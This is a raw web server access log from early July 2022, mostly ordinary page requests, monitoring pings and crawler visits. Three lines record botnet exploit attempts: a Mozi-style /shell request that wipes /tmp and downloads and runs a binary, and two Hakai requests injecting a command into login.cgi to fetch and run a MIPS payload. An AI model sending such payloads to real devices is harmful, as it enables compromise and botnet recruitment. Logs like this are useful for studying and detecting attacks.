59.95.93.162 - - [01/Jul/2022:23:56:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Jul/2022:23:56:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:57:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2022:23:59:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.127.38.49 - - [02/Jul/2022:00:00:14 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
136.243.83.42 - - [02/Jul/2022:00:02:22 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; MetaJobBot; https://www.metajob.de/crawler)"
136.243.83.42 - - [02/Jul/2022:00:02:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MetaJobBot; https://www.metajob.de/crawler)"
185.196.220.81 - - [02/Jul/2022:00:04:03 +0200] "GET /asp/view.asp HTTP/1.1" 404 317 "http://212.91.246.80:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
36.65.81.181 - - [02/Jul/2022:00:06:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
100.2.238.251 - - [02/Jul/2022:00:11:54 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
172.116.188.230 - - [02/Jul/2022:00:11:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
178.79.169.18 - - [02/Jul/2022:00:19:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
162.221.192.26 - - [02/Jul/2022:00:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
178.79.169.97 - - [02/Jul/2022:00:28:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
128.14.141.34 - - [02/Jul/2022:00:29:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
